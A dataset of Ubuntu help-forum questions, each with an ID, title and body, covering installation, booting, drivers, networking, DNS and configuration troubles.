398250	how can i install ubuntu on a usb external drive for booting ?	i want to boot ubuntu on my mac air ( 2010 ) using my external 1tb drive . i converted the install to .img fine in terminal . now i need to make a bootable usb drive to install i tried to do the sudo command but it told me my device can not be read by this computer after it waited a few minutes . i then tried unetbootin . but it says the bootable usb device can not be used on a mac . i just want to get ubuntu . this is the error i get when i get trough step 9 . the disk you inserted was not readable by this computer . everything else works great , until here . i took a chance and plugged in the usb drive unetbootin said could not be used to boot , well it does work . i did the trial , then successfully installed ubuntu on the external drive partition .
398254	.sh help please . trying to convert this to .bat	i have a .batch file with switches and parameters how would i run that in a bash file ? any help would be appreciated @ echo off title runserver '' c : \program files\java\jdk1.7.0_25\bin\java.exe '' -xmx815m -cp bin ; lib/* ; com.rs.launcher true true false pause how could u get a bash file to run the same way as the batch file ?
398258	do i need a swap partition ?	i have 4gb of ram and i want to install ubuntu . do i need a to have a swap partition ? because my computer has 4gb ram , i do not think it is necessary to have a swap partition . if i do need to have a swap partition , should it be a 4gb or an 8gb partition ?
398260	mining feathercoins in ubuntu ?	i would like to get started on mining some feathercoins but i have no idea where to start . does anyone know a good guide on how i can set up a feathercoin wallet and then mine them with my gtx 760 ? thanks in advance
398261	installation using wubi shows errors please help	i got these errors while attempting installation at windows xp using wubi http : //pastebin.com/raw.php ? i=x2qrhgcb http : //pastebin.com/raw.php ? i=167zpnwv
398266	word doc created in previous ubuntu not usable after upgrading	it now looks like this ... ÿÿÿÿ â [ w o r d d o c u m e n t ÿÿÿÿ ; ( s u m m a r y i n f o r m a t i o n ( ÿÿÿÿÿÿÿÿÿÿÿÿ k d o c u m e n t s u m m a r y i n f o r m a t i o n 8 ÿÿÿÿÿÿÿÿ s c o m p o b j ÿÿÿÿÿÿÿÿÿÿÿÿ q ÿÿÿÿÿÿÿÿÿÿÿÿ þÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ þÿ ÿÿÿÿ à f¬ microsoft office word document msworddoc word.document.8 ô9²q
398267	bootstrap to openstack cloud asks password to log in	i 'm testing the new beta openstack cloud of cloudvps.com and hitting a few problems . the first problem ( which i assume is very likely cloudvps beta related ) is that about half of the time the bootstrapped server is assigned ip 's ( three , is this normal ? ) - but they are not reachable , so the bootstrap fails after 10 minutes . checked that the ip 's are really not reachable , so something on the network level fails . this problem can likely be ignored here ( raising with their support ) . the other problem is that when the server can be reached , the bootstrap asks for a password - and failing to give that ( would not know what to give ) , fails the bootstrap . $ juju bootstrap -- show-log -- debug 2013-12-31 17:48:18 debug juju.environs.configstore disk.go:77 making /home/jaywink/.juju/environments 2013-12-31 17:48:18 info juju.provider.openstack provider.go:156 opening environment `` cloudvps '' 2013-12-31 17:48:20 info juju.environs.bootstrap bootstrap.go:46 bootstrapping environment `` cloudvps '' 2013-12-31 17:48:21 debug juju.environs.bootstrap synctools.go:91 looking for bootstrap tools : series= '' precise '' , arch= < nil > , version= < nil > 2013-12-31 17:48:21 info juju.environs.tools tools.go:85 reading tools with major.minor version 1.17 2013-12-31 17:48:21 info juju.environs.tools tools.go:96 filtering tools by series : precise 2013-12-31 17:48:21 debug juju.environs.tools tools.go:44 no architecture specified when finding tools , looking for any 2013-12-31 17:48:21 debug juju.environs.simplestreams simplestreams.go:667 using default candidate for content id `` com.ubuntu.juju : released : tools '' are { 20131025 mirrors:1.0 content-download streams/v1/cpc-mirrors.sjson [ ] } 2013-12-31 17:48:22 debug juju.environs.simplestreams simplestreams.go:538 no mirror information available for { nl https : //identity.stack.cloudvps.com/v2.0 } : mirror info with cloud { nl https : //identity.stack.cloudvps.com/v2.0 } not found 2013-12-31 17:48:22 debug juju.environs.simplestreams simplestreams.go:462 read metadata index at `` https : //streams.canonical.com/tools/streams/v1/index.sjson '' 2013-12-31 17:48:22 debug juju.environs.simplestreams simplestreams.go:625 candidate matches for products [ `` com.ubuntu.juju:12.04 : amd64 '' `` com.ubuntu.juju:12.04 : i386 '' `` com.ubuntu.juju:12.04 : arm '' ] are [ { sat , 26 oct 2013 00:56:32 +1000 products:1.0 content-download [ ] streams/v1/com.ubuntu.juju : released : tools.sjson [ com.ubuntu.juju:12.04 : amd64 com.ubuntu.juju:13.10 : amd64 ] } ] 2013-12-31 17:48:22 debug juju.environs.simplestreams simplestreams.go:937 finding products at path `` streams/v1/com.ubuntu.juju : released : tools.sjson '' 2013-12-31 17:48:22 debug juju.environs.simplestreams simplestreams.go:974 metadata : & { map [ com.ubuntu.juju:12.04 : amd64 : { 1.17.0 amd64 map [ 20131026:0xc200533360 ] } com.ubuntu.juju:13.10 : amd64 : { 1.17.0 amd64 map [ 20131026:0xc200533480 ] } ] map [ ] sat , 26 oct 2013 00:56:32 +1000 products:1.0 } 2013-12-31 17:48:22 info juju.environs.bootstrap bootstrap.go:58 picked newest version : 1.17.0 launching instance 2013-12-31 17:48:23 debug juju.environs.simplestreams simplestreams.go:481 fetchdata failed for `` http : //127.0.0.1:8000/images/streams/v1/index.sjson '' : can not find url `` http : //127.0.0.1:8000/images/streams/v1/index.sjson '' not found 2013-12-31 17:48:23 debug juju.environs.simplestreams simplestreams.go:458 can not load index `` http : //127.0.0.1:8000/images/streams/v1/index.sjson '' : invalid url `` http : //127.0.0.1:8000/images/streams/v1/index.sjson '' not found 2013-12-31 17:48:23 debug juju.environs.simplestreams simplestreams.go:481 fetchdata failed for `` http : //127.0.0.1:8000/images/streams/v1/mirrors.json '' : can not find url `` http : //127.0.0.1:8000/images/streams/v1/mirrors.json '' not found 2013-12-31 17:48:23 debug juju.environs.simplestreams simplestreams.go:557 no mirror index file found 2013-12-31 17:48:23 debug juju.environs.simplestreams simplestreams.go:462 read metadata index at `` http : //127.0.0.1:8000/images/streams/v1/index.json '' 2013-12-31 17:48:23 debug juju.environs.simplestreams simplestreams.go:625 candidate matches for products [ `` com.ubuntu.cloud : server:12.04 : amd64 '' ] are [ { sun , 29 dec 2013 22:52:21 +0200 products:1.0 image-ids custom [ { nl https : //identity.stack.cloudvps.com/v2.0 } ] streams/v1/com.ubuntu.cloud : released : imagemetadata.json [ com.ubuntu.cloud : server:12.04 : amd64 ] } ] 2013-12-31 17:48:23 debug juju.environs.simplestreams simplestreams.go:937 finding products at path `` streams/v1/com.ubuntu.cloud : released : imagemetadata.json '' 2013-12-31 17:48:23 debug juju.environs.simplestreams simplestreams.go:974 metadata : & { map [ com.ubuntu.cloud : server:12.04 : amd64 : { 12.04 amd64 map [ 20132912:0xc200492a20 ] } ] map [ ] sun , 29 dec 2013 22:52:21 +0200 products:1.0 com.ubuntu.cloud : custom } 2013-12-31 17:48:24 debug juju.provider.openstack provider.go:705 openstack user data ; 525 bytes 2013-12-31 17:48:27 info juju.provider.openstack provider.go:752 started instance `` f259497c-5c4f-49c1-980b-d74d73159f83 '' - f259497c-5c4f-49c1-980b-d74d73159f83 waiting for address attempting to connect to 213.187.240.25:22 attempting to connect to 185.21.189.219:22 attempting to connect to 185.21.188.115:22 ubuntu @ 185.21.189.219 's password : 2013-12-31 17:58:28 error juju.provider.common bootstrap.go:85 bootstrap failed : waited for 10m0s without being able to connect stopping instance ... 2013-12-31 17:58:28 debug juju.provider.openstack provider.go:775 terminating instances [ f259497c-5c4f-49c1-980b-d74d73159f83 ] 2013-12-31 17:58:29 error juju.cmd supercommand.go:294 waited for 10m0s without being able to connect during the 10 minutes i can verify that the machine is in fact running ok from their user interface . for some reason it just is n't logging in with the ssh key that i assume is uploaded during the machine creation . any ideas how to debug this ? running juju 1.17.0 .
398269	can i install ubuntu into an acer aspire 5634 wlmi notebook ?	i have an acer aspire 5634 wlmi notebook running windows xp . can i install ubuntu in this machine ? is there anybody who already did it ?
398270	why `mono -v` differs from `/usr/local/bin/mono -v`	i 've just compiled mono on my ubuntu server . since the last version was installed using the apt-get , it was pretty old version so i decided to compile the latest myself . after i ran make install i tested the newly installed version to see if it worked by running mono -v but it prompted the previous 2.4 version . then i tried /usr/local/bin/mono -v and this time i got 3.2.5 ! then i thought maybe the global command mono is pointed to some where else so i ran which mono but it stated that mono resides in /usr/local/bin/mono ! it seems to me that the previous mono is cached somewhere and it requires me to restart the computer to make the new mono available everywhere . but since it 's a server i would rather not . can someone please tell me how can i make the new mono available to global scope ?
398272	how can i mount my partition with executive permissions using the launcher icons ?	i 'm trying to install steam games onto my data partition ( ntfs formatted since i use that partition as a bridge for the few times i have to use windows ) . i do not want it in my home folder since it is starting to get a bit full ( i only have 16 gb of space left ) i tried this solution but apparently that does n't work anymore . i tried setting the library folder on the data partition but i just get the response : `` new steam library folder must be on a filesystem mounted with execute permissions . '' i usually mount my data partition using the launcher mount option unity brings with it ( just click on the drive on the side bar ) . i do n't really want to change that . so how can i mount my drives with executive permissions using the launcher icons ? ?
398275	downloading for bootable usb ( lubuntu ) - torrent vs download of standard image ?	i think i 'd better apologize right away for probably kind of stupid questions , i 'm a real beginner when it comes to linux or basically setting up operating systems at all . or , even computer stuff beyond using it to write or browse the internet ... however , i 'm willing to learn and since my way is trying out and i have a netbook i hardly use ( hp mini 210-1000 ) , i want to give it a try ; there 's nothing to lose ( except my dignity ; - ) ) so far i 'm under the impression that i should try out lubuntu and i have a usb stick i can use for booting . i 've been looking for download links and i wonder if i can use any of the lubuntu 13.10 32 bit links or do i have to observe some details if i do n't want to burn it on cd but use the usb ? for example , there is a link that says `` standard image disc '' and one that says `` torrent file '' . looking up `` torrent file '' and finding out that it has something to do with metadata has not really been helpful .
398277	what are bootinfo and boot-sav folders ?	those folders are located in /mnt/ . which program creates them and for what purpose ? /mnt $ ls bootinfo boot-sav bootinfo : sda2 sdb1 boot-sav : sda2 sdb1
398278	cant install alsaproject	i need help because i ca n't install alsaproject utils . this is the message i get when trying to install : gaston @ small1 : ~/descargas/alsa-utils-1.0.27.2 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... yes checking whether nls is requested ... yes checking for msgfmt ... no checking for gmsgfmt ... : checking for xgettext ... no checking for msgmerge ... no checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for shared library run path origin ... done checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for cfpreferencescopyappvalue ... no checking for cflocalecopycurrent ... no checking for gnu gettext in libc ... yes checking whether to use nls ... yes checking where the gettext function comes from ... libc checking for cross-compiler ... gcc checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking whether ln -s works ... yes checking for a sed that does not truncate output ... /bin/sed checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for alsa cflags ... checking for alsa ldflags ... -lasound -lm -ldl -lpthread checking for libasound headers version > = 1.0.27 ... not present . configure : error : sufficiently new version of libasound not found . gaston @ small1 : ~/descargas/alsa-utils-1.0.27.2 $ can you help me with this issue ? thanks in advance . gaston .
398280	folder action for ubuntu	i have a question concerning ubuntu folder action , i need a script to notify me when a file is add to a folder or the folder changes , is there any possibility for that . i found some articles about cron and inotify but it was complicated .. i need an easy method can any on help me .
398281	is it good practice to change apache 's /var/www/ ( default root directory ) ?	when you install apache , php 's default folder is /var/www/ by default . some developers find it necessary to change the root directory to something like : /home/public_html/ ( many shared hosting environments use this ) /home/user/ of course , this requires some tweaking and if you 're in the development phase perhaps it 's less of a hassle to stick with /var/www/ . what do you think ? should you change the root directory ? what are the pros and cons ?
398288	virtualbox install loop	i 'm running ubuntu 13.10 32-bit in virtualbox . once i installed it in virtualbox , i restarted , and it asked me once again to install . i just closed the window , so it went black and about 5 minutes later it opens up as if i had clicked the `` try ubuntu '' button . it was also very slow , it took a full minute to respond to any action . any help this time ?
398290	what is a good full featured media player for ubuntu ?	i have a lot of cd 's and want the player to read and display album title , song titles , artists , etc . what is the best media player software ?
398293	warning message in disk utility	after opening disk utility , i see an error message as follows on the 8.6g extended swap partition . `` warning : the partition is misaligned by 1024 bytes . this may result in very poor performance . repartitioning is suggested . '' should i be concerned ? the only other partition is an 8.6g swap . my os is ubuntu 12.04 lts
398296	i changed my var folder permission to 777 do i have to re-install the system	i just accidentally changed my var folder permission to 777 and it 's sub folders . do i have to re-install my system ? and as far until now it did n't made any trouble for me .
398305	making a triple boot pc win xp win 7 and ubuntu	ok i am starting all over with a 1tb hd i want to triple boot my pc win xp win 7 and ubuntu 12.04 and also have a left over partition for the gb left after i am done can this be done tripleboot
398307	what are requirements for ubuntu studio ?	i have an acer aspire 3682 wxmi laptop , 40gb hd , 512mb ram . will this take ubuntu , or more specifically ubuntu studio ?
398314	how to use touchscreen as a touchpad ?	how can i configure ubuntu so that it uses my computer 's touch-screen as a track-pad device ? i am using a hp pavilion ts sleekbook 14 with a egalax inc. egalaxtouch exc7910-1018-08.00.00
398315	how to request new driver for intel 4th generation ?	does anyone know process to request the creation of a new ubuntu driver for this : 4th generation intel ( r ) core ( tm ) i7-4500u processor + intel ( r ) hd graphics ( for 8gb memory ) cheers .
398316	after change of hostname , ubuntu does not recognize the name	after i had changed my hostname through opening a certain file i am unable to remember , i encountered several problems . i was unable to save back-ups , my computer was occasionally unable to identify my graphics card , causing it to be in low resolution mode and terminal did not recognize my host name . i tried other attempts to solve the low resolution problem , but was not able to . i dual-boot ubuntu 13.10 with windows 8 , and windows 8 was able to boot . i am new to ubuntu , so any feedback would be greatly appreciated . i am sorry if this is a repost , although i was not able to find another post similar to this .
398320	amd/ati radeon hd 6670 graphics are very laggy in 13.10	it 's very unfortunate because it really degrades the ubuntu experience compared to windows vista . a year ago i bought an amd/ati radeon hd 6670 graphic card because my old nvidia card was getting too old for windows 8 and ubuntu . but when i retried ubuntu with this newer card , i had a display problem . so i switched back to windows and waited , telling myself that it would get solved in a future update from the community . this update finally came between 13.04 and 13.10 . the open source drivers could finally make ubuntu look like ubuntu instead of a purple screen ... but the open source drivers are very , very laggy . so much that i ca n't handle browsing any web page with firefox . what feel snappy , surprisingly , are the cursor , the launcher and the dash . so i searched on the web and found instructions about switching to fglrx and fglrx-updates . man , you ca n't know how much this frustrated me . i had to reinstall ubuntu at least 10 times just because of these graphics . i could n't see any login screen . so i waited for another update . now , one year later i can finally use fglrx and fglrx-updates . however , to my great surprise ... it 's even laggier than the open source driver ! ? i swear it has nothing to do with my graphics card being not fast enough . in windows vista , everything is snappy . in fact , my seven years-old laptop with integrated intel graphics fares better . what should i do ? for now , my only solution seems to stay with windows ...
398321	notification when someone connects to my local network , arp , notification file	i have a question concerning ubuntu 12.04 lts desktop - notifications ( same notification as rhythmbox application when playing music back and forth ) , technically if i 'm not mistaken it should be called `` freedesktop.notifications.service '' . i just want to add notifications when one of my devices such as ; laptop , phone , tablet connect to my local network . my configuration is as follows : i have a wireless router . my router is connected directly to my desktop computer with a wire , i 'm using lan , the other devices connect through wi-fi . by way of example , let 's say : my router 's ip address : 192.168.1.1 & mac address xx : xx : xx : xx : xx : xx me - as server - 192.168.1.101 & mac address yy : yy : yy : yy : yy : yy smartphone - 192.168.1.102 & mac address zz : zz : zz : zz : zz : zz laptop - 192.168.1.103 & mac address kk : kk : kk : kk : kk : kk what i want to do is simple ; add those ip addresses along with their mac addresses in the arp and finally modify the notification file , whenever those devices connect to my local network i get notified . that 's it . p.s : i said `` arp '' . however , i 'm not sure if it is suitable , i 'm just supposing it has something to do with arp config file , and notification file . any suggestion using terminal or other application will be acceptable . i will be much appreciated if someone can help me .
398322	ubuntu12.04 dns resolve error	i have two dns nameservers in my /etc/resolv.conf file : nameserver 10.10.255.3 nameserver 10.10.103.123 i configured a domain name `` *.cloudstack.cf.test '' in dns nameserver 10.10.103.123 . then i use dig command `` dig api.cloudstack.cf.test '' , it does not work ! however , dig command `` dig @ 10.10.103.123 api.cloudstack.cf.test '' returns the ip address of host `` api.cloudstack.cf.test '' . i wonder does the order of nameservers in /etc/resolv.conf really matter ? how can i solve it ? thanks ! ps : i am using ubuntu12.04
398323	configure dns server in ubuntu server	how to configure dns in ubuntu server , such as reverse lookup zone . i need the steps so ubuntu dns server will act like windows dns server . can anyone give me the instructions ?
398324	ubuntu for samsung 's tab 3 8 '' galaxy ?	i have a samsung tab 3 8 '' galaxy , which uses an `` exynos dual-core processor . is there going to be a suitable version of ubuntu for it ?
398326	set fully qualified domain name on ec2 instance	i am trying to set a fully qualified domain name on ec2 instance . i have set cname entry in route53 , so when i go to sync1.staging1.mycompany.net , it resolves to the correct instance . what i have done so far without success , i have edited /etc/hostname ( so it stays the same after restarting ) : sync1.staging1.mycompany.net i have then used hostname command to set the hostname : sudo hostname sync1.staging1.mycompany.net i have then edited /etc/hosts and made sure this line is there : 127.0.0.1 localhost sync1.staging1.mycompany.net sync1 the problem is , when i run hostname -f , i get : localhost when i run hostname -s , i get correctly : sync1 when i run just hostname without parameters , i get : sync1.staging1.mycompany.net sync1 the problem is i am trying to run a puppet manifests which needs the fully qualified domain name to be set , otherwise i am getting an error when i run puppet apply manifests/site.pp : error : could not find default node or by name with 'sync1.eu-west-1.compute.internal , sync1.eu-west-1.compute , sync1.eu-west-1 , sync1 ' on node sync1.eu-west-1.compute.internal error : could not find default node or by name with 'sync1.eu-west-1.compute.internal , sync1.eu-west-1.compute , sync1.eu-west-1 , sync1 ' on node sync1.eu-west-1.compute.internal this is ec2 instance running on ubuntu 12.04 lts . any ideas ? do i need to set and elastic ip address for the instance in order for it to have the fully qualified domain name ?
398333	how can i install ubuntu on my old computer	i 've been trying to download and install ubuntu on my dell inspiron 6000 laptop computer with no luck . it 's an old computer about 9 years old . it has intel 1.6g processor and 2 gigs of memory . i had tried to install one of the ubuntu but i got a message that says i need an x86-64 . i have a 32bit laptop . i have only one hard drive with windows xp on it , how can i purchase a ubuntu o.s . or download the correct ubuntu for my particular computer but a current system where i can get support .
398334	missing network manager	i have just installed 12.04 lts but can not access network manager . internet access is ok . i have a wired connection to my router but want to set up a vpn . i have checked via terminal and is says network manager is installed but i can not find it . i 'm running this on an older emachines desktop that was running xp . i have tried some of the fixes posted on various sites but to no avail . any ideas ?
398335	how to install testdisk in ubuntu 13.10	i am unable to install testdisk in ubuntu 13.10 from live disk . i am using usb drive to run ubuntu 13.10 . i want to recover some data from windows partition . i am unable to install testdisk . it is a tar.bz2 file . i have extracted it in a directory . can someone help me with the steps to install the application .
398339	can someone explain what the problem with my multi boot load is ?	i was setting up my multiboot system for a test server and when i tried to launch the system i got this . edit : i set up its own partition on the drive for it and this happens when i boot the computer it wo n't let me select my os . i 'm also running ubuntu desktop and windows 7 .
398341	getting ( 0 handshakes ) with alfa network adapter	i have tried to capture interfaces using alfa adapter and always get 0 handshakes does anyone know how to solve getting `` 0 handshakes '' while capturing ?
398344	how to backup and restore the system ?	i want to install some drivers for my graphics card . usually when i do that something goes wrong , i then try to fix it , something else goes wrong . i finally end in failure and have a destroyed system and a non working driver . i want to have something like a checkpoint , or a full system image as backup . something to go back to if i fail . is there any way to do something like this ? how to make a backup image and how to restore it if needed ?
398345	problem dual booting ubuntu and windows 7	well , i wanted to use ubuntu alongside my windows 7 . so , i installed it from a usb . during installation it did n't detect my existing windows . so , i chose `` something else '' . from there i formatted a drive with settings : size : 20 gb type : primary partition , file system : ext4 . and mount point : `` \ '' then i allocated 4 gb extra for `` swap '' . then i installed ubuntu and it completed smoothly . then it asked me to reboot . after rebooting i was expecting a choice menu to choose between linux and windows . but i did n't get any menu ! ! ! and my windows booted normally . now i have been googling for 2 days and tried tons of ways . but no matter what i can not boot into ubuntu . can anyone plzzz help ... it would really help me a lot . thanks in advance .
398346	ca n't get mame to work for ubuntu	i have been trying to set up a computer to use as an arcade cabinet computer , but i ca n't figure out how to set up mame and roms on it . i have installed mame with sudo apt-get install mame mame-tools gnome-video-arcade sdlmame sdlmame-tools and i have set up all of the folders and made sure that the .ini file points to the correct rom path . i downloaded a rom from freeroms and put it in the rom folder still in a zip file . i started up mame by mame in the terminal , but when i do that it says `` no games found . please check the rompath specified in the mame.ini file . '' could i please have help setting mame up ? i 've done pretty much everything that i know how to do and it seems to me like i just have the wrong version of roms . i am open to re-installing everything if that would help . thanks !
398347	firefox stops working after setting wireless network password	running ubuntu 12.04 , i ca n't seem to get internet access even though the desktop icon says i am connected . so i reset the router , and everything seems to work fine , including after restarting the computer , but when i set a passphrase for the router i am unable to connect , no matter if it 's firefox , ssh , sftp , etc . please see this question for details i posted regarding the lack of connectivity . the security i set is wpa personal . i should also mention that i was able to connect to a different , secured wireless network , but am still unable to connect to my own . please let me know if you need more details !
398349	do donations go to canonical or to the ubuntu foundation ?	in the downloads page , you can contribute to ubuntu by donating money . i recall someone saying that this money goes to for-profit canonical to do as they please , and not to the not-for-profit ubuntu foundation . can anyone find a source for this assertion ?
398350	sound test on ubuntu 12.04 fails	sound test on ubuntu 12.04 fails . the audio is totally dead . i tried so many things proposed on this site and other sites but non of them worked . what can i do or where can i get an answer ? ? ? i need help badly..
398355	g++ compilation error `` cc1plus '' not found	i think i accidentally deleted a couple files from my machine , and now g++ wo n't compile . i tried to apt-get remove it then apt-get install it to see if it would fix it , but it did n't work . now i have no clue at all how to get g++ working again . here is the error : g++ : error trying to exec 'cc1plus ' : execvp : no such file or directory any ideas ? i 'm using ubuntu 12.04 precise arm version .
398356	unnable to acces other drives and partition due to insuficent permissions	i have a dell inspiron 15r running both ubuntu 13.10 and os x mountain lion . i was trying to change my ubuntu uid to 501 co i could read and write in the os x home folder without root permissions . now when i try to access the partition it tells that i donât have the permissions necessary to view the contents of the partition . it does the same thing for other drives that i use . i need an answer fast because school starts in two days .
398357	how can i get a variable from terminal to use it in my script ?	i 'm writing small programs that are allowing me to do common commands with just two or three words max like sudo apt-get update i made it upt something like that now i 'm trying to write a script which will allow me to install programs from terminal the command is sudo apt-get install 'program' i 'm asking here how can i save the command 'program ' in a variable to use it in my script so i can write in terminal inst 'program ' ?
398362	android ( galaxy note ) use specification	i 've used ubuntu live sessions with pcs . can i use an external sd card in the same way with my galaxy note tablet ? i want to be able to switch between a working version of my android tablet ( with the use of android apps ) and a working version of ubuntu touch . other options include backing up the android tablet onto an sd card , then restoring it when my workweek is done . but i would prefer to be able to switch two functional os 's . my goal is to record productivity in google docs . i 'm having trouble finding the right screencapture app on my android os .
398363	inverted desktop colors in ubuntu 12.04 after installation	after installing ubuntu 12.04 in my old sony vaio pcg-xg29 laptop i found that the colors on my desktop ( lxde ) were mixed up : the red signal is being sent as blue . the green signal is being sent as red . the blue signal is being sent as green . imagine the firefox logo is a purple fox around a green earth , instead of the correct orange fox around a blue earth . also pictures of peoples faces are blue instead of natural flesh colors . i also know it cant be my hardware as i had windows xp on the vaio laptop and the colors were fine . is there a fix to this ? i was looking online and i found other people with similar issues but no definite solutions . http : //ubuntuforums.org/archive/index.php/t-1974543.html
398366	how to remove ubuntu and recover windows after removing windows in the first place ?	i installed ubuntu from a usb instead of running alongside windows i made it the main os ... i now have a laptop with ubuntu on it and i really want windows back on the pc *ive tired sticking the windows recovery disc in nothing ive tried booting from recov disc nothing .. is there anyway i could earse everything and start from scratch my computer is `` hp pavilion p6536f-b pc bundle ''
398370	power button on menu bar goes red regularly	i 've upgraded to 13.10 in previous versions , the power button in the menu bar would go red after an upgrade that needed a restart to complete . now the power button goes red after running for a couple of hours or so . when it does , the reset option disappears from the menu ( although reset is a clickable option from the shut down selection ) . also , there is no message when hovering the mouse over the button as there was previously . i have been unable to find any information on what this might mean - and it does not seem mean much as the computer runs along fine . when i do reset , however , the button is white again for a few hours .
398372	running script at startup	i ca n't for the life of me get scripts to run at startup . i have a script called `` startup.sh '' in my home directory . i have tried ( at least ) the following ways to get it to run at startup : adding it to .profile adding it to .bashrc adding a run command to i3 's config ( i use i3 ) adding it to xsession and xinitrc ( i think , will retry ) adding it to /etc/rc.local adding it to init.d the only thing that worked was unity 's `` startup applications '' menu , which does n't work with i3 . any ideas ?
398376	grub problems ... ugh	i was experimenting with different distros of ubuntu to put on a crappy old laptop for pandora in my workshop and i decided that while i was waiting for parts to come ( mainly a charger ) i would try it on my desktop . i ran the install , everything worked fine . i rebooted , and everything looked nice and i chose kubuntu as my os for the laptop . later , i tried to reboot to my ubuntu studio installation , but found that it was no longer the default boot os . i figured , i can just take out the other hdd and all will be fine . all was not fine . i had forgotten that i had removed the hdd ( i was testing it the next day ) and i panicked . i scoured the forums and figured out what had happened . what i was unable to find , though , was an extremely easy way to move the grub to the old disk . i have gotten pretty good with some aspects of ubuntu over the last year or so , but i have n't messed with the grub , it was just something that always worked and i did n't need to dig into . so , as a consequence , i am unsure of what to do on this problem . i looked at other instructions , but i need something really clear and simple that explains what to do and what the reason for doing those things is . a lot of tutorials fall short ( in my eyes ) when they do n't explain why things are done . they just say what to do , and it makes it harder to figure out what exactly is going wrong . i am running ubuntu studio as my main audio workstation . as stated before , i was trying out kubuntu on that computer . when i rebooted , it had moved the grub to the kubuntu hdd . it is not a major problem , just a bit of an annoyance when i turn on the computer and i would like to be able to take this hdd out of the computer . i was just using it to test kubuntu and it is only 40gb ( tiny and un-nessecary compared to my main 1tb drive ) .
398378	how to uninstall fdupes from ubuntu	i have installed fdupes . i would like to know the authenticity of the program , any review would be highly appreciated . now i want to uninstall the program from ubuntu . please help with the steps . thanks .
398384	install packages to /usr/bin	i want to physically separate my data ( /home ) folder from my root folder for reasons of available space on an ssd i just got . i still , however , want to put my installed programs ( everything from g++ to playonlinux ) on the ssd for real-time data access . is there a way , short of getting the source and forcing the sudo to unpack the programs into the /usr/bin folder to ensure that all programs are installed there ? especially with sub-installs , like emulation layers ( vmware , playonlinux , etc ) would be really nice to know
398388	how do i get the `` installed a medium '' prompt to go away ?	when i plug my kindle into the usb port , i get an annoying popup that says : you have just installed a medium . select how to open kindle and whether to perform this action in the future for other media of type 'e-book reader . `` ask what to do , do nothing , or open folder . '' with a check-box option that says `` always perform this action . i 'm new , but i 'm not dead . there are many options without getting and thus having to deal with this prompt : click on stick icon on the side-bar which in this case means kindle , get it from the dash , get to it from files icon on sidebar , and type a prompt in the terminal to open it . bottom line ? why is it there and how do i make this popup prompt go away for faster , more streamlined computing ?
398389	how can ending process introduce security risk ?	i get this message when ending tasks in system monitor : i understand ending processes will remove data in memory and break its current session , but how can ending a process create a security risk ? ?
398390	hp envy 15 wifi toggle	i just got ubuntu 13.10 on my new hp laptop . the f6 key is for mute and when you use it the orange light lights up on the key and the sound turns off . f12 is for wifi ( on windows 8 it toggles airplane mode ) if i press it , it does nothing . is there something i can do to have the button turn wifi off and the light work ?
398392	ca n't login after setting `` not asked password on login '	i 'm currently using lubuntu 13.10 and now ca n't login to my default user . at first i thought i bored on typing password everytime i log in to my default user , so i go to menu -- > system tools -- > users and groups . i found the 'password ' setting and set it 'not asked on login ' . i do a reboot to try the result . on login screen , i see my default user , but it still have a password field . i 'm trying to do nothing on the field and pressed enter , but it loops back to the login screen . i 'm trying to re-type my old password , but still it loops back to login screen . currently i 'm log in using guest account , but i helplessly need files on my default user folder , which not accessible using this guest account . please help !
